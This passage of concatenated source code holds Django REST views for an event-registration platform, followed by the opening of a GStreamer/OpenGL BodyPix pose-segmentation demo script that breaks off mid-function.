Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster
)
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster
)
return JsonResponse({'code': 201, 'msg': '修改并保存活动草案'})
class DraftPublishView(GenericAPIView, UpdateModelMixin):
"""修改活动草案并申请发布"""
serializer_class = ActivityDraftUpdateSerializer
queryset = Activity.objects.filter(is_delete=0, status=1)
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
def put(self, reuqest, *args, **kwargs):
activity_id = self.kwargs.get('pk')
data = self.request.data
title = data['title']
date = data['date']
activity_type = data['activity_type']
synopsis = data['synopsis'] if 'synopsis' in data else None
poster = data['poster']
user_id = self.request.user.id
if activity_type == offline:
address = data['address']
detail_address = data['detail_address']
longitude = data['longitude']
latitude = data['latitude']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
activity_type=activity_type,
synopsis=synopsis,
address=address,
detail_address=detail_address,
longitude=longitude,
latitude=latitude,
schedules=json.dumps(data['schedules']),
poster=poster,
status=2
)
if activity_type == online:
start = data['start']
end = data['end']
Activity.objects.filter(id=activity_id, user_id=user_id).update(
title=title,
date=date,
start=start,
end=end,
activity_type=activity_type,
synopsis=synopsis,
schedules=json.dumps(data['schedules']),
poster=poster,
status=2
)
return JsonResponse({'code': 201, 'msg': '申请发布活动'})
class SponsorActivitiesPublishingView(GenericAPIView, ListModelMixin):
"""发布中的活动"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (SponsorPermission,)
@swagger_auto_schema(operation_summary='发布中(个人)的活动')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
queryset = Activity.objects.filter(is_delete=0, status=2, user_id=self.request.user.id).order_by('-date', 'id')
return queryset
class ActivityCollectView(GenericAPIView, CreateModelMixin):
"""收藏活动"""
serializer_class = ActivityCollectSerializer
queryset = ActivityCollect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='收藏活动')
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
activity_id = self.request.data['activity']
ActivityCollect.objects.create(activity_id=activity_id, user_id=user_id)
return JsonResponse({'code': 201, 'msg': '收藏活动'})
class ActivityCollectDelView(GenericAPIView, DestroyModelMixin):
"""取消收藏活动"""
serializer_class = ActivityCollectSerializer
queryset = ActivityCollect.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='取消收藏活动')
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
def get_queryset(self):
queryset = ActivityCollect.objects.filter(user_id=self.request.user.id)
return queryset
class MyActivityCollectionsView(GenericAPIView, ListModelMixin):
"""我收藏的活动(列表)"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我收藏的活动')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
collection_lst = ActivityCollect.objects.filter(user_id=user_id).values_list('activity', flat=True)
queryset = Activity.objects.filter(is_delete=0, id__in=collection_lst).order_by('-date', 'id')
return queryset
class ActivityRegisterView(GenericAPIView, CreateModelMixin):
"""活动报名"""
serializer_class = ActivityRegisterSerializer
queryset = ActivityRegister.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='活动报名')
def post(self, request, *args, **kwargs):
data = self.request.data
activity_id = data['activity']
user_id = self.request.user.id
if Activity.objects.filter(id=activity_id, user_id=user_id):
return JsonResponse({'code': 403, 'msg': '不能报名自己发起的活动'})
name = data['name']
telephone = data['telephone']
email = data['email']
company = data['company']
profession = data['profession'] if 'profession' in data else User.objects.get(id=user_id).profession
gitee_name = data['gitee_name'] if 'gitee_name' in data else User.objects.get(id=user_id).gitee_name
register_number = User.objects.get(id=self.request.user.id).register_number
register_number += 1
User.objects.filter(id=self.request.user.id).update(
name=name,
telephone=telephone,
email=email,
company=company,
profession=profession,
gitee_name=gitee_name,
register_number=register_number
)
ActivityRegister.objects.create(activity_id=activity_id, user_id=user_id)
register_number = len(ActivityRegister.objects.filter(user_id=self.request.user.id))
return JsonResponse({'code': 201, 'msg': '报名成功', 'register_number': register_number})
class ApplicantInfoView(GenericAPIView, RetrieveModelMixin):
"""报名者信息详情"""
serializer_class = ApplicantInfoSerializer
queryset = User.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='报名者信息详情')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class ApplicantsInfoView(GenericAPIView, CreateModelMixin):
"""报名者信息列表"""
queryset = ActivityRegister.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='报名者信息列表')
def post(self, request, *args, **kwargs):
data = self.request.data
try:
activity_id = data['activity']
mailto = data['mailto']
if not re.match(r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$', mailto):
return JsonResponse({'code': 400, 'msg': '请填入正确的收件邮箱'})
user_id = self.request.user.id
if not Activity.objects.filter(id=activity_id, user_id=user_id) and User.objects.get(
id=user_id).activity_level != 3:
return JsonResponse({'code': 403, 'msg': '无权查看该活动的报名列表'})
self.queryset = ActivityRegister.objects.filter(activity_id=activity_id)
send_applicants_info.run(self.queryset, mailto)
return JsonResponse({'code': '200', 'msg': '已发送活动报名信息'})
except KeyError:
return JsonResponse({'code': 400, 'msg': '需要activity和mailto两个参数'})
class RegisterActivitiesView(GenericAPIView, ListModelMixin):
"""我报名的活动列表"""
serializer_class = ActivitiesSerializer
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我报名的活动列表')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
user_id = self.request.user.id
register_lst = ActivityRegister.objects.filter(user_id=user_id).values_list('activity')
queryset = Activity.objects.filter(is_delete=0, id__in=register_lst).order_by('-date', 'id')
return queryset
class FeedbackView(GenericAPIView, CreateModelMixin):
"""意见反馈"""
serializer_class = FeedbackSerializer
queryset = Feedback.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='意见反馈')
def post(self, request, *args, **kwargs):
data = self.request.data
try:
feedback_type = data['feedback_type']
feedback_content = data['feedback_content']
feedback_email = data['feedback_email']
if not re.match(r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$', feedback_email):
return JsonResponse({'code': 400, 'msg': '请填入正确的收件邮箱'})
user_id = self.request.user.id
Feedback.objects.create(
feedback_type=feedback_type,
feedback_content=feedback_content,
feedback_email=feedback_email,
user_id=user_id
)
if feedback_type == 1:
feedback_type = '问题反馈'
if feedback_type == 2:
feedback_type = '产品建议'
send_feedback.run(feedback_type, feedback_email, feedback_content)
return JsonResponse({'code': 201, 'msg': '反馈意见已收集'})
except KeyError:
return JsonResponse(
{'code': 400, 'msg': 'feedback_type, feedback_content and feedback_email are all required!'})
class CountActivitiesView(GenericAPIView, ListModelMixin):
"""各类活动计数"""
queryset = Activity.objects.filter(is_delete=0, status__gt=2).order_by('-date', 'id')
filter_backends = [SearchFilter]
search_fields = ['title', 'enterprise']
@swagger_auto_schema(operation_summary='各类活动计数')
def get(self, request, *args, **kwargs):
search = self.request.GET.get('search')
activity_type = self.request.GET.get('activity_type')
if search and not activity_type:
self.queryset = self.queryset.filter(Q(title__icontains=search) | Q(enterprise__icontains=search))
if activity_type:
try:
if int(activity_type) == 1:
self.queryset = self.queryset.filter(activity_type=1)
if int(activity_type) == 2:
self.queryset = self.queryset.filter(activity_type=2)
if int(activity_type) == 1 and search:
self.queryset = self.queryset.filter(activity_type=1).filter(
Q(title__icontains=search) | Q(enterprise__icontains=search))
if int(activity_type) == 2 and search:
self.queryset = self.queryset.filter(activity_type=2).filter(
Q(title__icontains=search) | Q(enterprise__icontains=search))
except TypeError:
pass
all_activities_count = len(self.queryset.filter(is_delete=0, status__gt=2).values())
registering_activities_count = len(self.queryset.filter(is_delete=0, status__in=[3, 4]).values())
going_activities_count = len(self.queryset.filter(is_delete=0, status=4).values())
completed_activities_count = len(self.queryset.filter(is_delete=0, status=5).values())
res = {'all_activities_count': all_activities_count,
'registering_activities_count': registering_activities_count,
'going_activities_count': going_activities_count,
'completed_activities_count': completed_activities_count}
return JsonResponse(res)
class MyCountsView(GenericAPIView, ListModelMixin):
"""我的各类计数"""
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='我的各类计数')
def get(self, request, *args, **kwargs):
user_id = self.request.user.id
user = User.objects.get(id=user_id)
level = user.level
activity_level = user.activity_level
# shared
collected_meetings_count = len(Meeting.objects.filter(is_delete=0, id__in=(
Collect.objects.filter(user_id=user_id).values_list('meeting_id', flat=True))).values())
collected_activities_count = len(Activity.objects.filter(is_delete=0, id__in=(
ActivityCollect.objects.filter(user_id=user_id).values_list('activity_id', flat=True))).values())
res = {'collected_meetings_count': collected_meetings_count,
'collected_activities_count': collected_activities_count}
# permission limited
if level == 2:
created_meetings_count = len(Meeting.objects.filter(is_delete=0, user_id=user_id).values())
res['created_meetings_count'] = created_meetings_count
if level == 3:
created_meetings_count = len(Meeting.objects.filter(is_delete=0).values())
res['created_meetings_count'] = created_meetings_count
if activity_level < 3:
registerd_activities_count = len(Activity.objects.filter(is_delete=0, status__gt=2, id__in=(
ActivityRegister.objects.filter(user_id=user_id).values_list('activity_id', flat=True))).values())
res['registerd_activities_count'] = registerd_activities_count
if activity_level == 2:
published_activities_count = len(
Activity.objects.filter(is_delete=0, status__gt=2, user_id=user_id).values())
drafts_count = len(Activity.objects.filter(is_delete=0, status=1, user_id=user_id).values())
publishing_activities_count = len(Activity.objects.filter(is_delete=0, status=2, user_id=user_id).values())
res['published_activities_count'] = published_activities_count
res['register_table_count'] = published_activities_count
res['drafts_count'] = drafts_count
res['publishing_activities_count'] = publishing_activities_count
if activity_level == 3:
published_activities_count = len(Activity.objects.filter(is_delete=0, status__gt=2).values())
drafts_count = len(Activity.objects.filter(is_delete=0, status=1, user_id=user_id).values())
publishing_activities_count = len(Activity.objects.filter(is_delete=0, status=2).values())
res['published_activities_count'] = published_activities_count
res['register_table_count'] = published_activities_count
res['drafts_count'] = drafts_count
res['publishing_activities_count'] = publishing_activities_count
return JsonResponse(res)
class TicketView(GenericAPIView, RetrieveModelMixin):
"""查看活动门票"""
queryset = Activity.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
@swagger_auto_schema(operation_summary='查看活动门票')
def get(self, request, *args, **kwargs):
activity_id = self.kwargs.get('pk')
user_id = self.request.user.id
if not ActivityRegister.objects.filter(activity_id=activity_id, user_id=user_id):
return JsonResponse({'code': 404, 'msg': '用户还没有报名这个活动'})
res = {
'title': self.queryset.get(id=activity_id).title,
'poster': self.queryset.get(id=activity_id).poster,
'name': User.objects.get(id=user_id).name,
'telephone': User.objects.get(id=user_id).telephone
}
return JsonResponse(res)
class ActivitySignView(GenericAPIView, CreateModelMixin):
"""活动签到"""
serializer_class = ActivitySignSerializer
queryset = ActivitySign.objects.all()
permission_classes = (permissions.IsAuthenticated,)
authentication_classes = (authentication.JWTAuthentication,)
def post(self, request, *args, **kwargs):
user_id = self.request.user.id
activity_id = self.request.data['activity']
if not ActivityRegister.objects.filter(activity_id=activity_id, user_id=user_id):
return JsonResponse({'code': 404, 'msg': '用户还没有报名这个活动'})
if not ActivitySign.objects.filter(activity_id=activity_id, user_id=user_id):
ActivitySign.objects.create(activity_id=activity_id, user_id=user_id)
return JsonResponse({'code': 201, 'msg': '活动签到'})
class ActivityRegistrantsView(GenericAPIView, RetrieveModelMixin):
"""活动报名者信息"""
serializer_class = ActivityRegistrantsSerializer
queryset = Activity.objects.filter(is_delete=0)
permission_classes = (QueryPermission,)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
|
bodypix_gl_imx.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import io
import sys
import termios
import threading
import time
import queue
import numpy as np
from PIL import Image
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstGL', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstGL, GstVideo, Gtk
from OpenGL.arrays.arraydatatype import ArrayDatatype
from OpenGL.GLES3 import (
glActiveTexture, glBindBuffer, glBindTexture, glBindVertexArray, glBlendEquation, glBlendFunc,
glBufferData, glClear, glClearColor, glDeleteBuffers, glDeleteTextures, glDeleteVertexArrays,
glDisable, glDrawElements, glEnable, glEnableVertexAttribArray, glGenBuffers, glGenTextures,
glGenVertexArrays, glPixelStorei, glTexImage2D, glTexParameteri, glTexSubImage2D,
glVertexAttribPointer)
from OpenGL.GLES3 import (
GL_ARRAY_BUFFER, GL_BLEND, GL_CLAMP_TO_EDGE, GL_COLOR_BUFFER_BIT, GL_ELEMENT_ARRAY_BUFFER,
GL_FALSE, GL_FLOAT, GL_FRAGMENT_SHADER, GL_FUNC_ADD, GL_LINEAR, GL_NEAREST,
GL_ONE_MINUS_SRC_ALPHA, GL_R16F, GL_R32F, GL_RED, GL_RGB, GL_RGBA16F, GL_RGBA, GL_SRC_ALPHA, GL_STATIC_DRAW, GL_TEXTURE0,
GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_TEXTURE_MIN_FILTER, GL_TEXTURE_WRAP_S, GL_TEXTURE_WRAP_T,
GL_TRIANGLES, GL_UNPACK_ALIGNMENT, GL_UNSIGNED_BYTE, GL_UNSIGNED_SHORT, GL_VERTEX_SHADER)
import ctypes
from ctypes import pythonapi
from ctypes.util import find_library
from pose_engine import PoseEngine, EDGES, BODYPIX_PARTS
# Color mapping for bodyparts
RED_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "right" in v]
GREEN_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "hand" in v or "torso" in v]
BLUE_BODYPARTS = [k for k,v in BODYPIX_PARTS.items() if "leg" in v or "arm" in v or "face" in v or "hand" in v]
Gst.init(None)
# ctypes imports for missing or broken introspection APIs.
libgstgl = ctypes.CDLL(find_library('gstgl-1.0'))
libgstgl.gst_gl_memory_get_texture_id.argtypes = [ctypes.c_void_p]
libgstgl.gst_gl_memory_get_texture_id.restype = ctypes.c_uint
GstGLFramebufferFunc = ctypes.CFUNCTYPE(ctypes.c_bool, ctypes.py_object)
libgstgl.gst_gl_framebuffer_draw_to_texture.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
GstGLFramebufferFunc, ctypes.py_object]
libgstgl.gst_gl_framebuffer_draw_to_texture.restype = ctypes.c_bool
libgstgl.gst_is_gl_memory_egl.argtypes = [ctypes.c_void_p]
libgstgl.gst_is_gl_memory_egl.restype = ctypes.c_bool
def get_gl_texture_id(buf):
memory = buf.peek_memory(0)
assert GstGL.is_gl_memory(memory)
return libgstgl.gst_gl_memory_get_texture_id(hash(memory))
def is_egl_image(buf):
memory = buf.peek_memory(0)
assert GstGL.is_gl_memory(memory)
return libgstgl.gst_is_gl_memory_egl(hash(memory))
POSITIONS = np.array([
-1.0, -1.0,
1.0, -1.0,
1.0, 1.0,
-1.0, 1.0,
], dtype=np.float32)
TEXCOORDS = np.array([
0.0, 0.0,
1.0, 0.0,
1.0, 1.0,
0.0, 1.0,
], dtype=np.float32)
INDICES = np.array([
0, 1, 2, 0, 2, 3
], dtype=np.uint16)
FRAGMENT_SHADER_SRC = '''
precision mediump float;
varying vec2 v_texcoord;
uniform sampler2D image_tex, hm_tex, bg_tex;
uniform int stage;
uniform float ratio;
uniform float heatmap_mul;
// Clamps heatmap between [v0, v1] and rescales to [0,1]
float sample_heatmap(float v0, float v1)
{
float value = texture2D(hm_tex, v_texcoord).a;
float a = v0 / (v0 - v1);
float b = 1.0 / (v1 - v0);
return clamp(a + b * value, 0.0, 1.0);
}
vec4 stage0_background()
{
float heatmap = sample_heatmap(-2.3, -0.6);
vec4 bg = texture2D(bg_tex, v_texcoord);
vec4 image = texture2D(image_tex, v_texcoord);
vec4 estimate = (bg * heatmap + image * (1.0 - heatmap));
vec4 new_bg = bg * (1.0 - ratio) + ratio * estimate;
return new_bg;
}
vec4 stage1_anon_background()
{
return texture2D(bg_tex, v_texcoord);
}
vec4 stage2_overlays()
{
float heatmap = sample_heatmap(-1.0, 1.0)*heatmap_mul;
vec4 body_outline = vec4(texture2D(hm_tex, v_texcoord).xyz, 0.7*heatmap);
return body_outline;
}
void main()
{
if (stage == 0) {
gl_FragColor = stage0_background();
} else if (stage == 1) {
gl_FragColor = stage1_anon_background();
} else if (stage == 2) {
gl_FragColor = stage2_overlays();
} else {
gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
}
}
'''
KEYPOINT_SCORE_THRESHOLD = 0.2
SVG_HEADER = '<svg width="{w}" height="{h}" version="1.1" >'
SVG_STYLES = '''
<style>
.counter {{ font-size: {counter_size}px; font-family: sans-serif; }}
.text_bg {{ fill: black; }}
.text_fg {{ fill: white; }}
.bbox {{ stroke: white; stroke-width: 2; fill: none;}}
.kpcirc {{ fill: cyan; stroke: blue; }}
.kpline {{ stroke: blue; stroke-width: 2; }}
.whiteline {{ stroke: white; stroke-width: 2; }}
</style>
'''
SVG_BB_RECT = ' <rect x="{x}" y="{y}" width="{w}" height="{h}" class="bbox" />'
SVG_KP_CIRC = ' <circle cx="{cx}" cy="{cy}" r="5" class="kpcirc" />'
SVG_KP_LINE = ' <line x1="{x1}" y1="{y1}" x2="{x2}" y2="{y2}" class="kpline" />'
SVG_WHITE_LINE = ' <line x1="{x1}" y1="{y1}" x2="{x2}" y2="{y2}" class="whiteline" />'
SVG_TEXT = '''
<text x="{x}" y="{y}" dx="0.05em" dy="0.05em" class="{clazz} text_bg">{text}</text>
<text x="{x}" y="{y}" class="{clazz} text_fg">{text}</text>
'''
SVG_FOOTER = '</svg>'
TOGGLE_SKELETONS = 's'
TOGGLE_BBOXES = 'b'
TOGGLE_ANON = 'a'
TOGGLE_HEATMAP = 'h'
TOGGLE_BODYPARTS = 'p'
TOGGLE_RESET = 'r'
class Callback:
def __init__(self, engine, src_size, save_every_n_frames=-1, print_stats=False):
self.engine = engine
self.src_size = src_size
self.save_every_n_frames = save_every_n_frames
self.print_stats = print_stats
self.inf_q = queue.SimpleQueue()
self.trash = queue.SimpleQueue()
self.trash_lock = threading.RLock()
self.vinfo = GstVideo.VideoInfo()
self.glcontext = None
self.pool = None
self.fbo = None
self.default_shader = None
self.hm_shader = None
self.hm_tex_id = 0 # Instantaneous heatmap
self.vao_id = 0
self.positions_buffer = 0
self.texcoords_buffer = 0
self.vbo_indices_buffer = 0
self.frames = 0
self.reset_display_toggles()
self.inf_times = collections.deque(maxlen=100)
self.agg_times = collections.deque(maxlen=100)
self.frame_times = collections.deque(maxlen=100)
self.running = True
self.gc_thread = threading.Thread(target=self.gc_loop)
self.gc_thread.start()
self.last_frame_time = time.monotonic()
def reset_display_toggles(self):
self.skeletons = True
self.bboxes = True
self.anon = False
self.hm = True
self.bodyparts = True
def gc_loop(self):
while self.running:
try:
buf = self.trash.get(timeout=0.1)
self.trash.put(buf)
buf = None
self.empty_trash()
except queue.Empty:
pass
# gl thread
def empty_trash_gl(self, glcontext):
while True:
try:
buf = self.trash.get(block=False)
# Anyone trashing buffers must hold trash_lock to ensure
# the last ref is dropped in this thread!
with self.trash_lock:
buf = None
except queue.Empty:
break
def empty_trash(self):
self.glcontext.thread_add(self.empty_trash_gl)
# Caller must hold trash_lock until its final ref to bufs is dropped.
def trash_buffer(self, buf):
self.trash.put(buf)
# gl thread
def init_gl(self, glcontext):
#TODO deinit at some point
assert not self.glcontext
vert_stage = GstGL.GLSLStage.new_default_vertex(glcontext)
frag_stage = GstGL.GLSLStage.new_with_string(glcontext,
GL_FRAGMENT_SHADER,
GstGL.GLSLVersion.NONE,
GstGL.GLSLProfile.COMPATIBILITY | GstGL.GLSLProfile.ES,
FRAGMENT_SHADER_SRC)
self.hm_shader = GstGL.GLShader.new(glcontext)
self.hm_shader.compile_attach_stage(vert_stage)
self.hm_shader.compile_attach_stage(frag_stage)
self.hm_shader.link()
self.default_shader = GstGL.GLShader.new_default(glcontext)
a_position = self.default_shader.get_attribute_location('a_position')
a_texcoord = self.default_shader.get_attribute_location('a_texcoord')
self.vao_id = glGenVertexArrays(1)
glBindVertexArray(self.vao_id)
self.positions_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.positions_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(POSITIONS), POSITIONS, GL_STATIC_DRAW)
self.texcoords_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.texcoords_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(TEXCOORDS), TEXCOORDS, GL_STATIC_DRAW)
self.vbo_indices_buffer = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.vbo_indices_buffer)
glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(INDICES), INDICES, GL_STATIC_DRAW)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vbo_indices_buffer);
glBindBuffer(GL_ARRAY_BUFFER, self.positions_buffer);
glVertexAttribPointer.baseFunction(a_position, 2, GL_FLOAT, GL_FALSE, 0, None)
glBindBuffer(GL_ARRAY_BUFFER, self.texcoords_buffer);
glVertexAttribPointer.baseFunction(a_texcoord, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(a_position)
glEnableVertexAttribArray(a_texcoord)
glBindVertexArray(0)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
glBindBuffer(GL_ARRAY_BUFFER, 0)
hm_w, hm_h = self.get_heatmap_texture_size()
texture_ids = glGenTextures(1)
self.hm_tex_id = texture_ids
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA16F, hm_w, hm_h, 0, GL_RGBA, GL_FLOAT, None)
self.glcontext = glcontext
# gl thread
def init_fbo(self, glcontext, width, height):
#TODO deinit at some point
self.fbo = GstGL.GLFramebuffer.new_with_default_depth(self.glcontext, width, height)
# gl thread
def render_single_texture(self, tex):
glBindVertexArray(self.vao_id)
glActiveTexture(GL_TEXTURE0)
glBindTexture(GL_TEXTURE_2D, get_gl_texture_id(tex))
self.default_shader.use()
self.default_shader.set_uniform_1i('image_tex', 0)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
return True
# gl thread
def update_heatmap(self, glcontext, heatmap):
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id)
glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
glTexSubImage2D(GL_TEXTURE_2D, 0, 0, 0,
heatmap.shape[1], heatmap.shape[0],
GL_RGBA, GL_FLOAT, heatmap)
# Since the aspect ratio of the input image is not necessarily the
# same as the inference input size and we rescale while maintaining
# aspect ratio, we need to trim the heatmap to match the image
# aspect ratio.
def get_heatmap_texture_size(self):
src_ratio = self.src_size[0]/self.src_size[1]
inf_ratio = self.engine.image_width/self.engine.image_height
result = [
int(self.engine.heatmap_size[0]*min(1.0, src_ratio/inf_ratio)),
int(self.engine.heatmap_size[1]*min(1.0, inf_ratio/src_ratio)),
]
return result
# gl thread
def setup_scene(self, image_tex, bind_hm=True, bind_bg=True):
glBindVertexArray(self.vao_id)
glActiveTexture(GL_TEXTURE0)
glBindTexture(GL_TEXTURE_2D, image_tex)
glActiveTexture(GL_TEXTURE0 + 1)
glBindTexture(GL_TEXTURE_2D, self.hm_tex_id if bind_hm else 0)
glActiveTexture(GL_TEXTURE0 + 2)
glBindTexture(GL_TEXTURE_2D, get_gl_texture_id(self.bg_buf) if bind_bg else 0)
self.hm_shader.use()
self.hm_shader.set_uniform_1i('image_tex', 0)
self.hm_shader.set_uniform_1i('hm_tex', 1)
self.hm_shader.set_uniform_1i('bg_tex', 2)
# gl thread
def render_background(self, args):
vid_buf, new_bg_buf = args
# This is the mixing ratio of the instantaneous background estimate and
# the current aggregated background estimate.
ratio = max(0.001, 1.0 / max(1.0, self.frames / 2.0))
self.setup_scene(get_gl_texture_id(vid_buf))
self.hm_shader.set_uniform_1i('stage', 0)
self.hm_shader.set_uniform_1f('ratio', ratio)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
# Drop the ref to old background here in the GL thread.
self.bg_buf = new_bg_buf
return True
# gl thread
def render_anon_background(self, arg):
self.setup_scene(0, bind_hm=False)
self.hm_shader.set_uniform_1i('stage', 1)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
return True
# gl thread
def render_overlays(self, arg):
self.setup_scene(0, bind_bg=False, bind_hm=True)
self.hm_shader.set_uniform_1i('stage', 2)
self.hm_shader.set_uniform_1f('heatmap_mul', 1.0 if self.hm else 0.0)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_SHORT, None)
glDisable(GL_BLEND)
return True
# gl thread
def render_to_texture_gl(self, glcontext, dst, render_func, render_arg):
libgstgl.gst_gl_framebuffer_draw_to_texture(
hash(self.fbo),
hash(dst.peek_memory(0)),
GstGLFramebufferFunc(render_func),
render_arg)
meta = GstGL.buffer_add_gl_sync_meta(glcontext, dst)
meta.set_sync_point(glcontext)
def render_to_texture(self, dst, render_func, render_arg):
self.glcontext.thread_add(self.render_to_texture_gl, dst, render_func, render_arg)
def ensure_buffers_setup(self, vid_caps):
assert self.glcontext
if self.pool:
return
self.vinfo.from_caps(vid_caps)
self.glcontext.thread_add(self.init_fbo, self.vinfo.width, self.vinfo.height)
self.pool = GstGL.GLBufferPool.new(self.glcontext)
config = self.pool.get_config()
Gst.BufferPool.config_set_params(config, vid_caps, self.vinfo.size, 0, 0)
Gst.BufferPool.config_add_option(config, GstVideo.BUFFER_POOL_OPTION_VIDEO_META)
self.pool.set_config(config)
#TODO set inactive at some point
self.pool.set_active(True)
self.bg_buf = self.acquire_pooled_buffer()
def clear_texture(args):
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.render_to_texture(self.bg_buf, clear_texture, None)
def acquire_pooled_buffer(self):
assert self.pool
res, buf = self.pool.acquire_buffer()
assert res == Gst.FlowReturn.OK
return buf
def get_output_buffer(self, vid_caps, pts=Gst.CLOCK_TIME_NONE):
self.ensure_buffers_setup(vid_caps)
buf = self.acquire_pooled_buffer()
buf.pts = pts
return buf
def generate_svg(self, poses, inference_box, text):
box_x, box_y, box_w, box_h = inference_box
scale_x, scale_y = self.vinfo.width / box_w, self.vinfo.height / box_h
svg = io.StringIO()
svg.write(SVG_HEADER.format(w=self.vinfo.width , h=self.vinfo.height))
svg.write(SVG_STYLES.format(counter_size=int(3 * self.vinfo.height / 100)))
pose_count = 0
# Iterate over poses and keypoints just once.
for pose in poses:
xys = {}
bbox = [sys.maxsize, sys.maxsize, 0, 0]
good_poses = 0
for label, keypoint in pose.keypoints.items():
if keypoint.score < KEYPOINT_SCORE_THRESHOLD:
continue
good_poses += 1
# Offset and scale to source coordinate space.
kp_y = int((keypoint.yx[0] - box_y) * scale_y)
kp_x = int((keypoint.yx[1] - box_x) * scale_x)
bbox[0] = int(min(bbox[0], kp_y))
bbox[1] = int(min(bbox[1], kp_x))
bbox[2] = int(max(bbox[2], kp_y))
bbox[3] = int(max(bbox[3], kp_x))
xys[label] = (kp_x, kp_y)
# Keypoint.
if self.skeletons:
svg.write(SVG_KP_CIRC.format(cx=kp_x, cy=kp_y))
